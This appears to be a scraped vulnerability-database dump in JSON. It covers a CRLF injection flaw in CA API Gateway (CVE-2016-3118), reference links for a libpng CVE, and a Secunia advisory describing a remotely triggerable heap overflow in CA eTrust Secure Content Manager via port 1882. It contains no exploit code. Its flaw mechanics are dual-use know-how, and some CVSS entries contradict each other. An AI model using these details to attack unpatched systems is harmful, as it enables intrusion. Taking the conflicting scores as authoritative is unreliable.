"url": "https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-addressed-in-ibm-notes-9-0-cve-2011-3026-cve-2012-6349-cve-2012-6277/"
},
{
"trust": 0.1,
"url": "https://www.kb.cert.org/vuls/id/849841/"
},
{
"trust": 0.1,
"url": "https://www.tenable.com/plugins/nessus/67192"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/190.html"
},
{
"trust": 0.1,
"url": "https://github.com/argp/cve-2011-3026-firefox"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://launchpad.net/bugs/933399"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/thunderbird/3.1.19+build1+nobinonly-0ubuntu0.10.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/thunderbird/3.1.19+build1+nobinonly-0ubuntu0.10.10.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/thunderbird/3.1.19+build1+nobinonly-0ubuntu0.11.04.1"
},
{
"trust": 0.1,
"url": "http://www.ubuntu.com/usn/usn-1367-3"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/51365/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/849841"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51365"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/51365/"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/10.0.2+build1-0ubuntu0.10.10.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/10.0.2+build1-0ubuntu0.11.10.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/10.0.2+build1-0ubuntu0.11.04.1"
},
{
"trust": 0.1,
"url": "http://www.ubuntu.com/usn/usn-1367-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/10.0.2+build1-0ubuntu0.10.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/bugs/933293"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3464"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3045"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3045"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2692"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3048"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2501"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2692"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2690"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2501"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3026"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-5063"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2690"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3464"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-5063"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2691"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2012-0141.html"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2012-0142.html"
},
{
"trust": 0.1,
"url": "https://www.apple.com/itunes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3059"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3067"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1167"
},
{
"trust": 0.1,
"url": "http://support.apple.com/kb/ht1222"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3035"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3050"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3016"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3060"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2834"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2845"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3036"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1944"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3064"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3043"
},
{
"trust": 0.1,
"url": "http://www.freetype.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3041"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3021"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3032"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3044"
},
{
"trust": 0.1,
"url": "http://gpgtools.org"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3053"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3034"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3042"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2821"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-3026"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/advisories"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"db": "BID",
"id": "52049"
},
{
"db": "PACKETSTORM",
"id": "109898"
},
{
"db": "PACKETSTORM",
"id": "118291"
},
{
"db": "PACKETSTORM",
"id": "109897"
},
{
"db": "PACKETSTORM",
"id": "114070"
},
{
"db": "PACKETSTORM",
"id": "109835"
},
{
"db": "PACKETSTORM",
"id": "109836"
},
{
"db": "PACKETSTORM",
"id": "116791"
},
{
"db": "PACKETSTORM",
"id": "110096"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"db": "BID",
"id": "52049"
},
{
"db": "PACKETSTORM",
"id": "109898"
},
{
"db": "PACKETSTORM",
"id": "118291"
},
{
"db": "PACKETSTORM",
"id": "109897"
},
{
"db": "PACKETSTORM",
"id": "114070"
},
{
"db": "PACKETSTORM",
"id": "109835"
},
{
"db": "PACKETSTORM",
"id": "109836"
},
{
"db": "PACKETSTORM",
"id": "116791"
},
{
"db": "PACKETSTORM",
"id": "110096"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-20T00:00:00",
"db": "CERT/CC",
"id": "VU#849841"
},
{
"date": "2020-02-21T00:00:00",
"db": "VULHUB",
"id": "VHN-59558"
},
{
"date": "2012-02-16T00:00:00",
"db": "VULHUB",
"id": "VHN-50971"
},
{
"date": "2012-02-16T00:00:00",
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"date": "2012-02-15T00:00:00",
"db": "BID",
"id": "52049"
},
{
"date": "2012-02-18T03:05:35",
"db": "PACKETSTORM",
"id": "109898"
},
{
"date": "2012-11-23T08:19:51",
"db": "PACKETSTORM",
"id": "118291"
},
{
"date": "2012-02-18T03:05:23",
"db": "PACKETSTORM",
"id": "109897"
},
{
"date": "2012-06-22T20:23:59",
"db": "PACKETSTORM",
"id": "114070"
},
{
"date": "2012-02-17T02:34:07",
"db": "PACKETSTORM",
"id": "109835"
},
{
"date": "2012-02-17T02:34:24",
"db": "PACKETSTORM",
"id": "109836"
},
{
"date": "2012-09-22T06:24:25",
"db": "PACKETSTORM",
"id": "116791"
},
{
"date": "2012-02-23T05:06:20",
"db": "PACKETSTORM",
"id": "110096"
},
{
"date": "2012-02-16T20:55:04.083000",
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-28T00:00:00",
"db": "CERT/CC",
"id": "VU#849841"
},
{
"date": "2020-03-04T00:00:00",
"db": "VULHUB",
"id": "VHN-59558"
},
{
"date": "2020-04-16T00:00:00",
"db": "VULHUB",
"id": "VHN-50971"
},
{
"date": "2020-04-16T00:00:00",
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"date": "2015-04-13T21:51:00",
"db": "BID",
"id": "52049"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "52049"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Autonomy Keyview IDOL contains multiple vulnerabilities in file parsers",
"sources": [
{
"db": "CERT/CC",
"id": "VU#849841"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "52049"
}
],
"trust": 0.3
}
}
VAR-201604-0426
Vulnerability from variot - Updated: 2025-04-13 23:27CRLF injection vulnerability in CA API Gateway (formerly Layer7 API Gateway) 7.1 before 7.1.04, 8.0 through 8.3 before 8.3.01, and 8.4 before 8.4.01 allows remote attackers to have an unspecified impact via unknown vectors. Supplementary information : CWE Vulnerability type by CWE-93: Improper Neutralization of CRLF Sequences (CRLF injection ) Has been identified. http://cwe.mitre.org/data/definitions/93.htmlA third party may be affected unspecified. An attacker can exploit this issue to add arbitrary headers to a webpage. This may aid in further attacks. CA has fixes available. Update to the fix version indicated below. All Rights Reserved. One CA Plaza, Islandia, N.Y. 11749. All other trademarks, trade names, service marks, and logos referenced herein belong to their respective companies.
-----BEGIN PGP SIGNATURE----- Charset: utf-8
wsFVAwUBVwQ4wDuotw2cX+zOAQqaNg//Q3UFXyWWwTCUWubjAJD9XKmwmQ94mN1z Z8nZlDZoAvS72F0PM9IxPs4Y135Gxw6D9mbyOjDKcF1uPaZCCAHyAjsYf+wkwLyq l8ILYq1FPchY6lbwH+nx8U+XHRG0/g+mgGjBa4jDNhItGFVidxFFm1CjPHQkbONq xifyNhkys81InM115ikkhmXEE7CORRwmrtC+kHu/vnZpHO1yw9uUQNn4M41hmW2d 3fJt9D6m5mroBa9qN4Z6Q2GrOY7yRM54mETcEa6mDvh9jtRxhIuXVVmWBG0tI0fG 9+ul46MbNb1oSUQilrrDqlZOfnUvAPhvB2nCwnnO14cuI9pgslomVsXb6L1Td7XR to6lA60Q75GxPJRC8g0OPnq5OSW1WtUf7hnq+jJh0WFHN/zoacKPZiiPilsy9xCq rV4nMEm/MAZeF8nNljn434Z6HugoPcilkjmyk4aZPsZXq43xxO2flsedEubYH8dC 6qc6tkyyAQXXuwazf7cWk+jlCafjXDqSYz70KMRhyWCqMvNXWnlHfyc4TLWxUtU1 3C9YeLsp20RS6TSDTDCpZJMZyhIRN/icg7WA/Sjoh+spV6dZ9JTCB+oXpB7wP+8V t7kcF9hW+Dh/II1OUMN/PXvH72G4M1NyaPuBhFyVsdYU97uwfVGSPBqG2NqMkBlL yBbzOtDOq6s= =rWD3 -----END PGP SIGNATURE-----
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.3"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.2"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.4"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8.0 from 8.3.01"
},
{
"_id": null,
"model": "api gateway",
"scope": "lt",
"trust": 0.8,
"vendor": "ca",
"version": "8.3"
},
{
"_id": null,
"model": "api gateway",
"scope": "lt",
"trust": 0.8,
"vendor": "ca",
"version": "8.4"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8.4.01"
},
{
"_id": null,
"model": "api gateway",
"scope": "lt",
"trust": 0.8,
"vendor": "ca",
"version": "7.1"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "7.1.04"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.2"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.1"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.3"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.1"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.0"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
},
{
"db": "NVD",
"id": "CVE-2016-3118"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:api_gateway",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
}
]
},
"credits": {
"_id": null,
"data": "Patrick Webster of OSI Security",
"sources": [
{
"db": "BID",
"id": "85867"
}
],
"trust": 0.3
},
"cve": "CVE-2016-3118",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2016-3118",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-91937",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2016-3118",
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Physical",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-3118",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:P/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-3118",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2016-3118",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201604-034",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-91937",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-91937"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
},
{
"db": "NVD",
"id": "CVE-2016-3118"
}
]
},
"description": {
"_id": null,
"data": "CRLF injection vulnerability in CA API Gateway (formerly Layer7 API Gateway) 7.1 before 7.1.04, 8.0 through 8.3 before 8.3.01, and 8.4 before 8.4.01 allows remote attackers to have an unspecified impact via unknown vectors. Supplementary information : CWE Vulnerability type by CWE-93: Improper Neutralization of CRLF Sequences (CRLF injection ) Has been identified. http://cwe.mitre.org/data/definitions/93.htmlA third party may be affected unspecified. \nAn attacker can exploit this issue to add arbitrary headers to a webpage. This may aid in further attacks. CA has fixes\navailable. Update to the fix version indicated below. All Rights Reserved. One CA Plaza, Islandia,\nN.Y. 11749. All other trademarks, trade names, service marks, and\nlogos referenced herein belong to their respective companies. \n\n-----BEGIN PGP SIGNATURE-----\nCharset: utf-8\n\nwsFVAwUBVwQ4wDuotw2cX+zOAQqaNg//Q3UFXyWWwTCUWubjAJD9XKmwmQ94mN1z\nZ8nZlDZoAvS72F0PM9IxPs4Y135Gxw6D9mbyOjDKcF1uPaZCCAHyAjsYf+wkwLyq\nl8ILYq1FPchY6lbwH+nx8U+XHRG0/g+mgGjBa4jDNhItGFVidxFFm1CjPHQkbONq\nxifyNhkys81InM115ikkhmXEE7CORRwmrtC+kHu/vnZpHO1yw9uUQNn4M41hmW2d\n3fJt9D6m5mroBa9qN4Z6Q2GrOY7yRM54mETcEa6mDvh9jtRxhIuXVVmWBG0tI0fG\n9+ul46MbNb1oSUQilrrDqlZOfnUvAPhvB2nCwnnO14cuI9pgslomVsXb6L1Td7XR\nto6lA60Q75GxPJRC8g0OPnq5OSW1WtUf7hnq+jJh0WFHN/zoacKPZiiPilsy9xCq\nrV4nMEm/MAZeF8nNljn434Z6HugoPcilkjmyk4aZPsZXq43xxO2flsedEubYH8dC\n6qc6tkyyAQXXuwazf7cWk+jlCafjXDqSYz70KMRhyWCqMvNXWnlHfyc4TLWxUtU1\n3C9YeLsp20RS6TSDTDCpZJMZyhIRN/icg7WA/Sjoh+spV6dZ9JTCB+oXpB7wP+8V\nt7kcF9hW+Dh/II1OUMN/PXvH72G4M1NyaPuBhFyVsdYU97uwfVGSPBqG2NqMkBlL\nyBbzOtDOq6s=\n=rWD3\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3118"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "BID",
"id": "85867"
},
{
"db": "VULHUB",
"id": "VHN-91937"
},
{
"db": "PACKETSTORM",
"id": "136592"
}
],
"trust": 2.07
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2016-3118",
"trust": 2.9
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034",
"trust": 0.7
},
{
"db": "BID",
"id": "85867",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "136592",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-91937",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-91937"
},
{
"db": "BID",
"id": "85867"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "PACKETSTORM",
"id": "136592"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
},
{
"db": "NVD",
"id": "CVE-2016-3118"
}
]
},
"id": "VAR-201604-0426",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-91937"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:27:26.045000Z",
"patch": {
"_id": null,
"data": [
{
"title": "CA20160405-01: Security Notice for CA API Gateway",
"trust": 0.8,
"url": "http://www.ca.com/us/support/ca-support-online/product-content/recommended-reading/security-notices/ca20160405-01-security-notice-for-ca-api-gateway.aspx"
},
{
"title": "CA API Gateway CRLF Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=60769"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "NVD",
"id": "CVE-2016-3118"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.7,
"url": "http://www.ca.com/us/support/ca-support-online/product-content/recommended-reading/security-notices/ca20160405-01-security-notice-for-ca-api-gateway.aspx"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3118"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3118"
},
{
"trust": 0.1,
"url": "https://support.ca.com/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsbpldgpg"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3118"
},
{
"trust": 0.1,
"url": "https://www.ca.com/us/support/ca-support-online/documents.aspx?id=177782"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-91937"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
},
{
"db": "PACKETSTORM",
"id": "136592"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
},
{
"db": "NVD",
"id": "CVE-2016-3118"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-91937",
"ident": null
},
{
"db": "BID",
"id": "85867",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001938",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "136592",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2016-3118",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2016-04-06T00:00:00",
"db": "VULHUB",
"id": "VHN-91937",
"ident": null
},
{
"date": "2016-04-05T00:00:00",
"db": "BID",
"id": "85867",
"ident": null
},
{
"date": "2016-04-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001938",
"ident": null
},
{
"date": "2016-04-06T13:39:41",
"db": "PACKETSTORM",
"id": "136592",
"ident": null
},
{
"date": "2016-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-034",
"ident": null
},
{
"date": "2016-04-06T01:59:28.840000",
"db": "NVD",
"id": "CVE-2016-3118",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2016-04-07T00:00:00",
"db": "VULHUB",
"id": "VHN-91937",
"ident": null
},
{
"date": "2016-04-05T00:00:00",
"db": "BID",
"id": "85867",
"ident": null
},
{
"date": "2016-04-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001938",
"ident": null
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-034",
"ident": null
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-3118",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "136592"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "CA API Gateway In CRLF Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001938"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-034"
}
],
"trust": 0.6
}
}
VAR-201102-0158
Vulnerability from variot - Updated: 2025-04-11 23:12The eCS component (ECSQdmn.exe) in CA ETrust Secure Content Manager 8.0 and CA Gateway Security 8.1 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a crafted request to port 1882, involving an incorrect integer calculation and a heap-based buffer overflow. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability.The specific flaw exists in the eTrust Common Services Transport (ECSQdmn.exe) running on port 1882. When making a request to this service a user supplied DWORD value is used in a memory copy operation. Due to the lack of bounds checking an integer can be improperly calculated leading to a heap overflow. If successfully exploited this vulnerability will result in a remote system compromise with SYSTEM credentials. Failed exploit attempts will result in a denial-of-service condition. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/
TITLE: CA Secure Content Manager Common Services Transport Vulnerability
SECUNIA ADVISORY ID: SA43200
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43200/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43200
RELEASE DATE: 2011-02-10
DISCUSS ADVISORY: http://secunia.com/advisories/43200/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/43200/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43200
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
